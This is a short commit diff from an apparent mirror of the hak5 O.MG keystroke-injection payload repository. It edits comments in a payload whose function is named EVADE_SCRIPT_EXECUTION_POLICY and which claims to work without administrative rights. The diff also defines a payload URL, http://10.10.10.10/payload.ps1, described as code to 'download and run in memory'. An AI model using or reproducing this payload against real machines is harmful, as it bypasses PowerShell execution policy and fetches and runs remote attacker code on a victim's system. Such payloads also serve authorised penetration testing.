mirror of https://github.com/hak5/omg-payloads.git
parent
8d8fb3fddc
commit
c67545fc0a
|
@ -19,8 +19,8 @@ REM_BLOCK
|
|||
This can be accomplished without administrative rights.
|
||||
END_REM
|
||||
|
||||
REM Formatting is not indented to comply with O.MG Editor/UI
|
||||
FUNCTION EVADE_SCRIPT_EXECUTION_POLICY()
|
||||
REM Formatting is 'untabbed' to comply with O.MG Editor/UI
|
||||
REM Normally I would add this below the header, as it's a constant, but moving it here for portability
|
||||
REM Payload to download and run in memory
|
||||
DEFINE #PAYLOAD_URL "http://10.10.10.10/payload.ps1"
|
||||
|
|
Loading…
Reference in New Issue